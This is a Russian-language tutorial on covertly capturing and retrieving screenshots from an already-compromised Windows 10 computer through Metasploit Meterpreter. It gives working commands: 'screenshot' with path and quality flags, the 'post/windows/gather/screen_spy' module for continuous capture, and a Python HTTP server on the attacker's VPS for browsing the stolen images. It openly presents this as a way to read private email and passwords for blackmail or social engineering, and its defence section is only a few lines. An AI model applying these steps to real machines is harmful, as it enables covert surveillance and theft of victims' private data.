Как удаленно сделать и получить скриншот экрана

Скриншоты, сделанные на взломанном компьютере, могут дать хакерам доступ к личным электронным письмам, фотографиям и информации, которую можно найти только в конфиденциальных документах. Эти данные могут использоваться злоумышленниками при создании профилей цели для выполнения последующих атак социальной инженерии, шантажа или даже для публикации информации в Интернете.

Получение бэкдора на целевом компьютере — это весьма нелегкая задача, но как только хакер это сделает, он сможет осуществлять различные скрытые атаки. Он может красть сохраненные пароли Chrome и Firefox, перехватывать нажатия кнопок на клавиатуре пока пользователь что-то печатает, подслушивать разговоры через микрофон компьютера и многое другое. В этой статье мы расскажем, как злоумышленники могут удаленно делать и получать скриншоты со скомпрометированного компьютера.

Как только хакер сделает полезную нагрузку и начнет эксплуатацию уязвимости целевой системы (в нашем случае системы Windows 10), для создания и получения скриншотов экрана он может использовать фреймворк Metasploit. Эта возможность Metasploit очень полезна для хакеров. Она позволяет, например, визуализировать данные, которые перехватываются кейлоггерами (снифферами), просматривать файлы и содержание флешек, открытых жертвой, читать личные электронные письма, при этом даже не пытаясь выяснить пароль от почтового ящика. Скриншоты также могут помочь злоумышленникам узнать пароли в тех случаях, когда жертва, подозревая наличие кейлоггера, для ввода паролей использует экранную клавиатуру Windows.

Шаг 1. Как сделать скриншот

Быстрое снятие одного скриншота может пригодиться, когда злоумышленники хотят сразу увидеть, что происходит на целевом компьютере.

Используя команду screenshot в Meterpreter, хакер может получить скриншот всего экрана скомпрометированного компьютера и сохранить полученную картинку в папку на VPS, принадлежащем хакеру. При этом жертва, использующая взломанный компьютер, никогда не узнает о том, что произошло, поскольку операционная система Windows никак не сигнализирует пользователю о том, что только что был сделан снимок экрана.

screenshot

Как видно из приведенного ниже скриншота, успешно сделанные скриншоты сохраняются в текущей папке (/tmp) и этим файлам автоматически присваиваются случайные имена.

Можно сохранить скриншот в заранее определенной папке при помощи -p, затем указать желаемый путь. Использование аргумента -p также потребует ручного задания имен сохраняемых файлов. Очень важным является добавление расширения файла JPEG к имени файла, поскольку это единственный формат, который поддерживается screenshot-модулем.

screenshot -p /root/Desktop/ImageNameHere.jpeg

Аргумент -q определяет качество сделанного снимка экрана. По умолчанию снимок экрана сохраняется на уровне 50% от его максимально возможного качества, которое обычно размыто, и на нем трудно читать мелкий шрифт. Для создания скриншота самого высокого качества можно использовать значение 100.

screenshot -p /root/Desktop/ImageNameHere.jpeg -q 100

Ниже приведен пример качества скриншота, сделанного с параметром –q, установленным на 100%.

В зависимости от сценария имеет смысл делать скриншоты как раз более низкого разрешения, поскольку пересылка большого количества таких скриншотов со скомпрометированного компьютера может занять много времени. Однако, если качество сделанного снимка экрана слишком низкое, то будет трудно понять, что же происходит на таком скриншоте. Вот тот же экран, что и на примере выше, только качество скриншота установлено в минимально возможное значение. Как видите текст в «Блокноте» больше не читается.

Шаг 2. Удаленный просмотр сделанных снимков экрана

Чтобы просмотреть только что сделанный и сохраненный на VPS снимок экрана, откройте новый терминал (не выходя из консоли meterpreter) и подключитесь через SSH к VPS. Затем при помощи команды cd перейдите в директорию /tmp (или любую другую, в которую были сохранены снимки экрана).

cd /tmp

Теперь воспользуйтесь Python3 для создания простого HTTP-сервера на 8080-м порту, как показано ниже. Аргумент -m вызывает модуль Python’a 3 «http.server», а 8080 — это порт, открытый и используемый для размещения веб-сервера.

python3 -m http.server 8080

С открытым терминалом, где запущен наш временный веб-сервер Python 3, можно просмотреть скриншоты из любого веб-браузера и из любой точки мира, просто введя IP-адрес VPS в адресной строке браузера и добавив номер порта после двоеточия:

http://IP_адрес_вашего_VPS:8080/Имя_Файла.jpeg

Остановить сервер Python3 можно нажав Ctrl + C.

Шаг 3. Автоматизация создания скриншотов

Злоумышленнику может понадобиться делать скриншоты в течение длительного периода времени. Постоянно вызывать на исполнение приведенную выше команду — не очень практичный способ создания большого количества последовательных скриншотов.

Чтобы создавать серию скриншотов на скомпрометированном компьютере, злоумышленники могут использовать модуль screen_spy, который можно найти в директории post/windows/gather/:

use post/windows/gather/screen_spy

Команду options можно использовать для просмотра доступных параметров этого модуля.

options

Параметр COUNT задает общее количество снимков экрана, а опция DELAY определяет количество секунд, которое должно пройти между каждым скриншотом. Значение по умолчанию для параметра COUNT составляет 6 скриншотов, что довольно мало для любого более или менее реалистичного сценария. Для шестичасовой сессии, в течение которой каждые 10 секунд будет сниматься скриншот, общее количество сделанных скриншотов составит 2 160 штук.

Если 2 160 скринов — это слишком много или слишком мало, или вообще не имеет никакого значения, то лучше установить значение COUNT на произвольно высокое значение или просто изменить значение для DELAY. Значения COUNT и DELAY можно выставить с помощью вот этих команд:

set COUNT новое_значение
 set DELAY новое_значение

Затем в параметрах модуля необходимо указать идентификатор сессии — SESSION ID. Команду sessions можно использовать, чтобы просмотреть все скомпрометированные устройства.

sessions

После того, как будет установлен идентификатор SESSION ID (можно найти с левой стороны) для конкретного целевого устройства, для запуска модуля screen_spy можно воспользоваться командой run.

Консоль meterpreter занята этим процессом и ее нельзя будет использовать, пока работает модуль screen_spy. Новые созданные скриншоты будут автоматически сохраняться в каталоге /root/.msf4/loot/.

Шаг 4. Просмотр автоматически сделанных скриншотов

Скриншотами, сделанными с помощью модуля screen_spy, сложнее управлять, поскольку каждый день они будут создаваться сотнями (если не тысячами). Чтобы просмотреть только что сделанные screen_spy скриншоты, откройте новый терминал (не выходя из консоли Meterpreter) и подключитесь через SSH к VPS. Затем с помощью команды cd перейдите в директорию /root/.msf4/loot/:

cd /root/.msf4/loot/

Затем точно так же используйте сервер Python 3 порт 8080:

python3 -m http.server 8080

И точно таким же образом, чтоб просмотреть сделанные скриншоты, вставьте в адресную строку браузера адрес вашего VPS и порта.

http://IP_адрес_VPS:8080

Кроме того, добавление в конец команды Python 3 символа & запустит сервер как фоновый процесс, что позволит закрыть терминал Python 3 без прекращения работы самого сервера. Это позволит злоумышленникам беспрепятственно получать доступ к файлам и изображениям в каталоге /loot.

python3 -m http.server 8080 &

Как защитить себя от создания скриншотов

К сожалению, нет возможности предотвратить использование Metasploit для получения снимков вашего экрана и у жертвы-пользователя Windows 10 нет никакой возможности узнать, что был произведен снимок экрана. Антивирусное ПО должно быть обновленным и сканирование файлов должно проводиться на регулярной основе. Это может помочь обнаружить и удалить обычные бэкдоры и вирусы. В противном случае лучшая профилактическая мера, которую вы можете выполнить — это защита вашего ПК таким образом, чтобы хакер не смог установить на него бэкдор.